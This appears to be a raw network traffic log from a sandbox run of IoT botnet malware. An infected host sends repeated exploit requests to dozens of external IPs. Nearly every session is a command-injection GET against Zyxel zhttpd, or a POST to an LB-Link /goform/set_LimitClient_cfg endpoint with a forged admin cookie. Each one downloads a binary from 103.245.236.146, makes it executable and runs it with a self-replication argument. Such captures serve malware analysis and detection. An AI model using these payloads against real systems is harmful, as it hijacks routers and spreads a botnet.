                                                Jan 28, 2024 10:16:41.056555033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8616192.168.2.2355472120.32.60.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056571960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8617192.168.2.2359840115.68.147.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056632042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8618192.168.2.2351296152.33.7.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056643963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8619192.168.2.2351790158.155.123.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056672096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8620192.168.2.2344992211.159.96.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056705952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8621192.168.2.2333820149.159.229.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056730986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8622192.168.2.2336326147.0.37.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056763887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8623192.168.2.2358060138.74.76.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056777954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8624192.168.2.235453649.214.148.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056811094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8625192.168.2.2335144168.189.11.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.056834936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8626192.168.2.234400095.111.152.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.059765100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8627192.168.2.2347216104.20.72.668080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.541426897 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:41.659672976 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Sun, 28 Jan 2024 09:16:41 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8628192.168.2.234118282.131.14.868080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.652556896 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:42.328109980 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:43.328077078 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8629192.168.2.2342152112.176.234.1228080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.707562923 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:41.987890005 CET103INHTTP/1.1 404 Not Found
                                                Content-Type: text/plain
                                                Content-Length: 30
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8630192.168.2.235651647.189.184.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.052484035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8631192.168.2.2355006178.209.135.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.052659035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8632192.168.2.2343252212.158.238.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055758953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8633192.168.2.234133044.155.82.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055799007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8634192.168.2.2356194180.104.135.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055815935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8635192.168.2.234791668.79.109.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055821896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8636192.168.2.235458854.68.125.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055860996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8637192.168.2.233432062.72.76.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.055962086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8638192.168.2.233478690.92.32.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056014061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8639192.168.2.2356250159.251.64.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056041956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8640192.168.2.2352170145.8.231.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056058884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8641192.168.2.2336310205.129.223.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056088924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8642192.168.2.236050078.187.36.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056128979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8643192.168.2.2349298202.61.228.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056133032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8644192.168.2.2346590122.127.252.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056176901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8645192.168.2.2346822119.251.46.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056181908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8646192.168.2.2351850183.32.244.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056202888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8647192.168.2.2342250183.170.25.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056246996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8648192.168.2.234717013.12.95.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056265116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8649192.168.2.234226885.19.121.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056284904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8650192.168.2.2352112167.189.138.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056319952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8651192.168.2.234306252.38.155.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056346893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8652192.168.2.2350916133.225.113.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056377888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8653192.168.2.2334544100.191.39.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056412935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8654192.168.2.233890472.252.233.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056436062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8655192.168.2.2339772108.4.54.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056463003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8656192.168.2.2341384128.166.115.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056497097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8657192.168.2.2342364157.169.125.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056498051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8658192.168.2.233522491.68.249.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056521893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8659192.168.2.234315485.156.205.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056541920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8660192.168.2.235435435.118.233.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056552887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8661192.168.2.2344228121.228.253.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056574106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8662192.168.2.233915637.53.40.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056583881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8663192.168.2.2360004169.150.11.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056633949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8664192.168.2.2351130165.165.20.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056677103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8665192.168.2.2336678149.153.80.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056706905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8666192.168.2.2340342105.33.71.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056720972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8667192.168.2.2338596143.249.105.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:42.056726933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8668192.168.2.235595420.46.39.128443
                                                TimestampBytes transferredDirectionData
